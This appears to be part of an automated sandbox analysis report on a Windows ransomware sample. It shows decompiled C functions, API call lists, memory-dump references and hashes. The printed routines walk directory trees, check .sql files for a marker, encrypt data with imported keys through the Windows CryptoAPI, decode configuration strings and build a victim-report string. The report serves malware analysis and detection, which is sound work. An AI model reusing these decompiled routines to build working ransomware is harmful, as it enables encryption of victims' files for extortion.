                                    0x0f1456a9
                                    0x0f1456ab
                                    0x0f14569f
                                    0x0f14569f
                                    0x0f14569f
                                    0x0f1456a5
                                    0x0f1456a5
                                    0x0f1456ad
                                    0x0f1456bf
                                    0x0f1456c8
                                    0x0f1456ca
                                    0x0f1456cb
                                    0x0f1456d0
                                    0x0f1456d2
                                    0x0f1456d3
                                    0x0f1456d5
                                    0x0f1456d6
                                    0x0f1456d8
                                    0x0f1456d9
                                    0x0f1456db
                                    0x0f1456dc
                                    0x0f1456de
                                    0x0f1456e1
                                    0x0f1456e3
                                    0x0f1456e4
                                    0x0f1456ec
                                    0x0f1456f7
                                    0x0f145702
                                    0x0f145718
                                    0x0f14571e
                                    0x0f145724
                                    0x0f14572a
                                    0x0f14572f
                                    0x0f145739
                                    0x0f145739
                                    0x0f145757
                                    0x0f145759
                                    0x0f145760
                                    0x0f14576d
                                    0x0f145773
                                    0x0f145773
                                    0x0f14577b
                                    0x0f145780
                                    0x0f14578f
                                    0x0f1457a6
                                    0x0f1457a8
                                    0x0f1457a8
                                    0x0f1457be
                                    0x0f1457be
                                    0x0f1457cb
                                    0x0f1457ce
                                    0x0f1457d0
                                    0x0f1457d3
                                    0x0f1457d8
                                    0x0f1457e1
                                    0x0f1457e1
                                    0x0f1457da
                                    0x0f1457da
                                    0x0f1457df
                                    0x00000000
                                    0x00000000
                                    0x0f1457df
                                    0x0f1457e9
                                    0x0f1457ef
                                    0x0f1457f1
                                    0x0f1457f4
                                    0x0f1457f4
                                    0x0f1457f9
                                    0x0f1457ff
                                    0x0f145801
                                    0x0f145801
                                    0x0f145803
                                    0x0f14580a
                                    0x0f1457f4
                                    0x0f145816
                                    0x0f145830
                                    0x0f14583d
                                    0x0f145845
                                    0x0f145854
                                    0x0f145858
                                    0x0f14585e

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F145696
                                    • wsprintfW.USER32 ref: 0F1456BF
                                    • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F145708
                                    • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F14571E
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F145739
                                    • lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0F14574B
                                    • VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0F145757
                                    • wsprintfA.USER32 ref: 0F14576D
                                    • CryptBinaryToStringA.CRYPT32(00000000,772966A0,40000001,00000000,?), ref: 0F14579E
                                    • GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0F1457A8
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F1457B5
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0F1457C4
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F1457CE
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F1457EB
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F145804
                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F14583D
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F145854
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
                                    • String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
                                    • API String ID: 823394411-2102589890
                                    • Opcode ID: 7d51965d1e13a0745fe833b3a17a78f8a8b49cf2241c8a8c9eae4f14b81935e5
                                    • Instruction ID: 463c6c75a6dbe9c65ab20ed5b8e887b0670b2fe0e34c2c0a68e892fe15d89658
                                    • Opcode Fuzzy Hash: 7d51965d1e13a0745fe833b3a17a78f8a8b49cf2241c8a8c9eae4f14b81935e5
                                    • Instruction Fuzzy Hash: 1451C575A40304BFEB209F64DC46F9E7B79AF84B01F540068F605A71C1DBB4BA64CB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F146BA0(WCHAR* __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				WCHAR* _v16;
                                    				WCHAR* _v20;
                                    				long _v24;
                                    				struct _WIN32_FIND_DATAW _v620;
                                    				int _t38;
                                    				struct _SECURITY_ATTRIBUTES* _t40;
                                    				int _t50;
                                    				WCHAR* _t52;
                                    				intOrPtr _t53;
                                    				void* _t54;
                                    				WCHAR* _t57;
                                    				long _t64;
                                    				WCHAR* _t66;
                                    				void* _t67;
                                    
                                    				_t66 = __ecx;
                                    				_v16 = __ecx;
                                    				_t52 =  &(_t66[lstrlenW(__ecx)]);
                                    				_v20 = _t52;
                                    				lstrcatW(_t66, "*");
                                    				_v8 = FindFirstFileW(_t66,  &_v620);
                                    				 *_t52 = 0;
                                    				_t53 = 0;
                                    				do {
                                    					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                    						goto L20;
                                    					} else {
                                    						lstrcatW(_t66,  &(_v620.cFileName));
                                    						_t38 = lstrlenW(_t66);
                                    						_t10 = _t38 - 1; // -1
                                    						_t57 =  &(_t66[_t10]);
                                    						if(_t38 == 0) {
                                    							L18:
                                    							_t53 = 0;
                                    							goto L19;
                                    						} else {
                                    							while( *_t57 != 0x2e) {
                                    								_t57 = _t57 - 2;
                                    								_t38 = _t38 - 1;
                                    								if(_t38 != 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							if(_t38 == 0) {
                                    								goto L18;
                                    							} else {
                                    								_t40 = lstrcmpW(_t57, L".sql");
                                    								if(_t40 != 0) {
                                    									goto L18;
                                    								} else {
                                    									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
                                    									_t64 = GetFileSize(_t54, 0);
                                    									_v12 = 0;
                                    									if(_t64 < 0x40000000) {
                                    										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
                                    										if(_t67 != 0) {
                                    											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F148260(_t67, "*******************") != 0) {
                                    												_t50 = lstrlenA("*******************");
                                    												_t15 = _t67 + 1; // 0x1
                                    												_v12 = E0F146B40(_t15 + _t50);
                                    											}
                                    											VirtualFree(_t67, 0, 0x8000);
                                    										}
                                    										_t66 = _v16;
                                    									}
                                    									CloseHandle(_t54);
                                    									_t53 = _v12;
                                    									if(_t53 == 0) {
                                    										L19:
                                    										 *_v20 = 0;
                                    										goto L20;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					break;
                                    					L20:
                                    				} while (FindNextFileW(_v8,  &_v620) != 0);
                                    				FindClose(_v8);
                                    				return _t53;
                                    			}



















                                    0x0f146bab
                                    0x0f146baf
                                    0x0f146bbe
                                    0x0f146bc1
                                    0x0f146bc4
                                    0x0f146bde
                                    0x0f146be3
                                    0x0f146be6
                                    0x0f146bf0
                                    0x0f146c00
                                    0x00000000
                                    0x0f146c1c
                                    0x0f146c24
                                    0x0f146c2b
                                    0x0f146c31
                                    0x0f146c34
                                    0x0f146c39
                                    0x0f146d08
                                    0x0f146d08
                                    0x00000000
                                    0x0f146c40
                                    0x0f146c40
                                    0x0f146c46
                                    0x0f146c49
                                    0x0f146c4a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f146c4a
                                    0x0f146c4e
                                    0x00000000
                                    0x0f146c54
                                    0x0f146c5a
                                    0x0f146c5e
                                    0x00000000
                                    0x0f146c64
                                    0x0f146c77
                                    0x0f146c82
                                    0x0f146c86
                                    0x0f146c8f
                                    0x0f146ca0
                                    0x0f146ca4
                                    0x0f146cb7
                                    0x0f146cce
                                    0x0f146cd4
                                    0x0f146cde
                                    0x0f146cde
                                    0x0f146ce9
                                    0x0f146ce9
                                    0x0f146cef
                                    0x0f146cef
                                    0x0f146cf3
                                    0x0f146cf9
                                    0x0f146cfe
                                    0x0f146d0a
                                    0x0f146d0f
                                    0x00000000
                                    0x0f146d0f
                                    0x0f146cfe
                                    0x0f146c5e
                                    0x0f146c4e
                                    0x0f146c39
                                    0x00000000
                                    0x0f146d12
                                    0x0f146d22
                                    0x0f146d2d
                                    0x0f146d3b

                                    APIs
                                    • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146BB2
                                    • lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146BC4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146BD2
                                    • lstrcmpW.KERNEL32(?,0F14FF48,?,?), ref: 0F146BFC
                                    • lstrcmpW.KERNEL32(?,0F14FF4C,?,?), ref: 0F146C12
                                    • lstrcatW.KERNEL32(00000000,?), ref: 0F146C24
                                    • lstrlenW.KERNEL32(00000000,?,?), ref: 0F146C2B
                                    • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F146C5A
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F146C71
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F146C7C
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F146C9A
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F146CAF
                                    • lstrlenA.KERNEL32(*******************,?,?), ref: 0F146CCE
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F146CE9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 0F146CF3
                                    • FindNextFileW.KERNEL32(?,?,?,?), ref: 0F146D1C
                                    • FindClose.KERNEL32(?,?,?), ref: 0F146D2D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                    • String ID: *******************$.sql
                                    • API String ID: 3616287438-58436570
                                    • Opcode ID: 46b5185c1a2d721f75edd701e06f1f43e6b7b44bc7591706724ec7d68c76ec80
                                    • Instruction ID: 46ef9007ec0287b104bf2d16eed319b7b1fa456369d272ddf1411933451aea4e
                                    • Opcode Fuzzy Hash: 46b5185c1a2d721f75edd701e06f1f43e6b7b44bc7591706724ec7d68c76ec80
                                    • Instruction Fuzzy Hash: 0A41C275640215ABDB209F60CC48FAFB7BCEF85719F414065F901E3141EB79BA65CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E0F146660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
                                    				long* _v8;
                                    				long* _v12;
                                    				int _v16;
                                    				char _v20;
                                    				long _v24;
                                    				char _v28;
                                    				intOrPtr _v32;
                                    				long** _t26;
                                    				char* _t31;
                                    				int _t33;
                                    				long _t36;
                                    
                                    				EnterCriticalSection(0xf152a48);
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				_t26 =  &_v8;
                                    				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
                                    				if(_t26 != 0) {
                                    					L6:
                                    					_v16 = 0;
                                    					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
                                    						_v20 = 0xa;
                                    						_t31 =  &_v20;
                                    						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
                                    						_v32 = _t31;
                                    						 *_a16 = 0xc8;
                                    						_t33 = _a12;
                                    						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
                                    						_v16 = _t33;
                                    						_v24 = GetLastError();
                                    						if(_v16 == 0) {
                                    							E0F1436C0(_t34);
                                    						}
                                    					}
                                    					CryptReleaseContext(_v8, 0);
                                    					LeaveCriticalSection(0xf152a48);
                                    					return _v16;
                                    				}
                                    				_t36 = GetLastError();
                                    				if(_t36 != 0x80090016) {
                                    					return 0;
                                    				}
                                    				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                    				if(_t36 != 0) {
                                    					goto L6;
                                    				}
                                    				return 0;
                                    			}














                                    0x0f14666b
                                    0x0f146671
                                    0x0f146678
                                    0x0f14668d
                                    0x0f146691
                                    0x0f146699
                                    0x0f1466d1
                                    0x0f1466d1
                                    0x0f1466f4
                                    0x0f1466f6
                                    0x0f1466ff
                                    0x0f14670d
                                    0x0f146713
                                    0x0f146719
                                    0x0f146727
                                    0x0f146735
                                    0x0f14673b
                                    0x0f146744
                                    0x0f14674b
                                    0x0f146750
                                    0x0f146750
                                    0x0f14674b
                                    0x0f14675b
                                    0x0f146766
                                    0x00000000
                                    0x0f14676c
                                    0x0f14669b
                                    0x0f1466a6
                                    0x00000000
                                    0x0f1466ca
                                    0x0f1466b7
                                    0x0f1466bf
                                    0x00000000
                                    0x0f1466c8
                                    0x00000000

                                    APIs
                                    • EnterCriticalSection.KERNEL32(0F152A48,?,0F1438F4,00000000,00000000,00000000,?,00000800), ref: 0F14666B
                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F1438F4,00000000,00000000,00000000), ref: 0F146691
                                    • GetLastError.KERNEL32(?,0F1438F4,00000000,00000000,00000000), ref: 0F14669B
                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F1438F4,00000000,00000000,00000000), ref: 0F1466B7
                                    • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F1438F4,00000000,00000000), ref: 0F1466EC
                                    • CryptGetKeyParam.ADVAPI32(00000000,00000008,0F1438F4,0000000A,00000000,?,0F1438F4,00000000), ref: 0F14670D
                                    • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F1438F4,?,0F1438F4,00000000), ref: 0F146735
                                    • GetLastError.KERNEL32(?,0F1438F4,00000000), ref: 0F14673E
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F1438F4,00000000,00000000), ref: 0F14675B
                                    • LeaveCriticalSection.KERNEL32(0F152A48,?,0F1438F4,00000000,00000000), ref: 0F146766
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                    • API String ID: 72144047-1948191093
                                    • Opcode ID: 1f5c5b933a134f77f7781c1bf0b544bbb1ae0a007917866a18d974f4cb27255a
                                    • Instruction ID: 98fde12f312e2d3649159e3d5ac61c3a16295fd4a9f2904b6d7b25337c0033a8
                                    • Opcode Fuzzy Hash: 1f5c5b933a134f77f7781c1bf0b544bbb1ae0a007917866a18d974f4cb27255a
                                    • Instruction Fuzzy Hash: D0314375A40305BBEB10DFA0DD45F9E7774AF84715F104148F605A7180D7B9B9549FA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F146DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                    				void* _v12;
                                    				intOrPtr _v16;
                                    				WCHAR* _v20;
                                    				intOrPtr _v24;
                                    				struct _WIN32_FIND_DATAW _v616;
                                    				void* _t35;
                                    				signed int _t37;
                                    				int _t39;
                                    				signed int _t42;
                                    				void* _t46;
                                    				signed int* _t48;
                                    				WCHAR* _t53;
                                    				intOrPtr* _t54;
                                    				short _t57;
                                    				WCHAR* _t63;
                                    				void* _t67;
                                    
                                    				_v24 = __edx;
                                    				_t63 = __ecx;
                                    				"SVWj@h"();
                                    				if(__eax == 0 || E0F146BA0(__ecx) != 0) {
                                    					L17:
                                    					__eflags = 0;
                                    					return 0;
                                    				} else {
                                    					E0F146D40(__ecx);
                                    					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                    					_v20 = _t53;
                                    					lstrcatW(_t63, "*");
                                    					_t35 = FindFirstFileW(_t63,  &_v616);
                                    					_t57 = 0;
                                    					_v12 = _t35;
                                    					 *_t53 = 0;
                                    					if(_t35 != 0xffffffff) {
                                    						_t54 = _a12;
                                    						do {
                                    							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                    							__eflags = _t37;
                                    							if(_t37 != 0) {
                                    								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                    								__eflags = _t42;
                                    								if(_t42 != 0) {
                                    									lstrcatW(_t63,  &(_v616.cFileName));
                                    									__eflags = _v616.dwFileAttributes & 0x00000010;
                                    									if(__eflags == 0) {
                                    										_v16 =  *_t54;
                                    										_t46 = E0F146AB0(_t63,  &_v616, __eflags, _t57, _a4);
                                    										_t67 = _t67 + 8;
                                    										 *_t54 =  *_t54 + _t46;
                                    										asm("adc [ebx+0x4], edx");
                                    										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                    										if(__eflags <= 0) {
                                    											if(__eflags < 0) {
                                    												L12:
                                    												_t48 = _a8;
                                    												 *_t48 =  *_t48 + 1;
                                    												__eflags =  *_t48;
                                    											} else {
                                    												__eflags = _v16 -  *_t54;
                                    												if(_v16 <  *_t54) {
                                    													goto L12;
                                    												}
                                    											}
                                    										}
                                    									} else {
                                    										E0F146DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                    										_t67 = _t67 + 0xc;
                                    									}
                                    									_t57 = 0;
                                    									__eflags = 0;
                                    									 *_v20 = 0;
                                    								}
                                    							}
                                    							_t39 = FindNextFileW(_v12,  &_v616);
                                    							__eflags = _t39;
                                    						} while (_t39 != 0);
                                    						FindClose(_v12);
                                    						goto L17;
                                    					} else {
                                    						return 0xdeadbeaf;
                                    					}
                                    				}
                                    			}



















                                    0x0f146dfc
                                    0x0f146dff
                                    0x0f146e01
                                    0x0f146e08
                                    0x0f146f36
                                    0x0f146f36
                                    0x0f146f3c
                                    0x0f146e1d
                                    0x0f146e1d
                                    0x0f146e35
                                    0x0f146e38
                                    0x0f146e3b
                                    0x0f146e45
                                    0x0f146e4b
                                    0x0f146e4d
                                    0x0f146e50
                                    0x0f146e56
                                    0x0f146e64
                                    0x0f146e70
                                    0x0f146e7c
                                    0x0f146e82
                                    0x0f146e84
                                    0x0f146e96
                                    0x0f146e9c
                                    0x0f146e9e
                                    0x0f146ea8
                                    0x0f146eaa
                                    0x0f146eb1
                                    0x0f146ee2
                                    0x0f146ee5
                                    0x0f146eea
                                    0x0f146eed
                                    0x0f146eef
                                    0x0f146ef2
                                    0x0f146ef5
                                    0x0f146ef7
                                    0x0f146f00
                                    0x0f146f00
                                    0x0f146f03
                                    0x0f146f03
                                    0x0f146ef9
                                    0x0f146efc
                                    0x0f146efe
                                    0x00000000
                                    0x00000000
                                    0x0f146efe
                                    0x0f146ef7
                                    0x0f146eb3
                                    0x0f146ec7
                                    0x0f146ecc
                                    0x0f146ecc
                                    0x0f146f0e
                                    0x0f146f0e
                                    0x0f146f10
                                    0x0f146f10
                                    0x0f146e9e
                                    0x0f146f1d
                                    0x0f146f23
                                    0x0f146f23
                                    0x0f146f2e
                                    0x00000000
                                    0x0f146e58
                                    0x0f146e63
                                    0x0f146e63
                                    0x0f146e56

                                    APIs
                                      • Part of subcall function 0F146780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F146E06,00000000,?,?), ref: 0F146793
                                      • Part of subcall function 0F146780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F146E06,00000000,?,?), ref: 0F14685A
                                      • Part of subcall function 0F146780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F146E06,00000000,?,?), ref: 0F146874
                                      • Part of subcall function 0F146780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F146E06,00000000,?,?), ref: 0F14688E
                                      • Part of subcall function 0F146780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F146E06,00000000,?,?), ref: 0F1468A8
                                      • Part of subcall function 0F146BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146BB2
                                      • Part of subcall function 0F146BA0: lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146BC4
                                      • Part of subcall function 0F146BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146BD2
                                      • Part of subcall function 0F146BA0: lstrcmpW.KERNEL32(?,0F14FF48,?,?), ref: 0F146BFC
                                      • Part of subcall function 0F146BA0: lstrcmpW.KERNEL32(?,0F14FF4C,?,?), ref: 0F146C12
                                      • Part of subcall function 0F146BA0: lstrcatW.KERNEL32(00000000,?), ref: 0F146C24
                                      • Part of subcall function 0F146BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0F146C2B
                                      • Part of subcall function 0F146BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F146C5A
                                      • Part of subcall function 0F146BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F146C71
                                      • Part of subcall function 0F146BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F146C7C
                                      • Part of subcall function 0F146BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F146C9A
                                      • Part of subcall function 0F146BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F146CAF
                                      • Part of subcall function 0F146D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F146E22,00000000,?,?), ref: 0F146D55
                                      • Part of subcall function 0F146D40: wsprintfW.USER32 ref: 0F146D63
                                      • Part of subcall function 0F146D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F146D7F
                                      • Part of subcall function 0F146D40: GetLastError.KERNEL32(?,?), ref: 0F146D8C
                                      • Part of subcall function 0F146D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F146DD8
                                    • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146E23
                                    • lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146E3B
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146E45
                                    • lstrcmpW.KERNEL32(?,0F14FF48,?,?), ref: 0F146E7C
                                    • lstrcmpW.KERNEL32(?,0F14FF4C,?,?), ref: 0F146E96
                                    • lstrcatW.KERNEL32(00000000,?), ref: 0F146EA8
                                    • lstrcatW.KERNEL32(00000000,0F14FF7C), ref: 0F146EB9
                                    • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F146F1D
                                    • FindClose.KERNEL32(00003000,?,?), ref: 0F146F2E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
                                    • String ID:
                                    • API String ID: 664581897-0
                                    • Opcode ID: f6a1567e7825f3426096630de81995b52de7f8d8a7404020e78de46528ebd260
                                    • Instruction ID: 95213dc7d620ce5b499ee82081deadc6832f0d27548237852a7733914f5b53dd
                                    • Opcode Fuzzy Hash: f6a1567e7825f3426096630de81995b52de7f8d8a7404020e78de46528ebd260
                                    • Instruction Fuzzy Hash: 6D31D171A00219EBCF14EF64DC849AEB7B8FFC6315B0041A5E904E7241EB35BA65CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F1434F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
                                    				int _v8;
                                    				CHAR* _v12;
                                    				WCHAR** _v16;
                                    				long _t11;
                                    				WCHAR* _t17;
                                    				WCHAR* _t18;
                                    				void* _t23;
                                    				void* _t28;
                                    				int _t29;
                                    				WCHAR** _t30;
                                    
                                    				_v16 = __edx;
                                    				_v12 = __ecx;
                                    				_t29 = 0;
                                    				_t11 = lstrlenA(__ecx);
                                    				_v8 = _t11;
                                    				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
                                    				if(_t23 != 0) {
                                    					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
                                    						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    						_t30 = _v16;
                                    						 *_t30 = _t17;
                                    						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    						_t28 = _t23;
                                    						 *_a4 = _t18;
                                    						if( *_t23 != 0x3b) {
                                    							do {
                                    								_t28 = _t28 + 1;
                                    							} while ( *_t28 != 0x3b);
                                    						}
                                    						 *_t28 = 0;
                                    						wsprintfW( *_t30, L"%S", _t23);
                                    						_t8 = _t28 + 1; // 0x2
                                    						wsprintfW( *_a4, L"%S", _t8);
                                    						_t29 = 1;
                                    					}
                                    					VirtualFree(_t23, 0, 0x8000);
                                    				}
                                    				return _t29;
                                    			}













                                    0x0f1434fa
                                    0x0f1434ff
                                    0x0f143502
                                    0x0f143504
                                    0x0f143519
                                    0x0f14351e
                                    0x0f143522
                                    0x0f14353d
                                    0x0f14354c
                                    0x0f14354e
                                    0x0f14355f
                                    0x0f143561
                                    0x0f143566
                                    0x0f14356b
                                    0x0f14356d
                                    0x0f143570
                                    0x0f143570
                                    0x0f143571
                                    0x0f143570
                                    0x0f143584
                                    0x0f143587
                                    0x0f143589
                                    0x0f143597
                                    0x0f14359c
                                    0x0f14359c
                                    0x0f1435a9
                                    0x0f1435a9
                                    0x0f1435b7

                                    APIs
                                    • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0F143673,00000000), ref: 0F143504
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0F143673,00000000), ref: 0F14351C
                                    • CryptStringToBinaryA.CRYPT32(0F143673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F143535
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F143673,00000000), ref: 0F14354C
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F143673,00000000), ref: 0F143561
                                    • wsprintfW.USER32 ref: 0F143587
                                    • wsprintfW.USER32 ref: 0F143597
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,0F143673,00000000), ref: 0F1435A9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
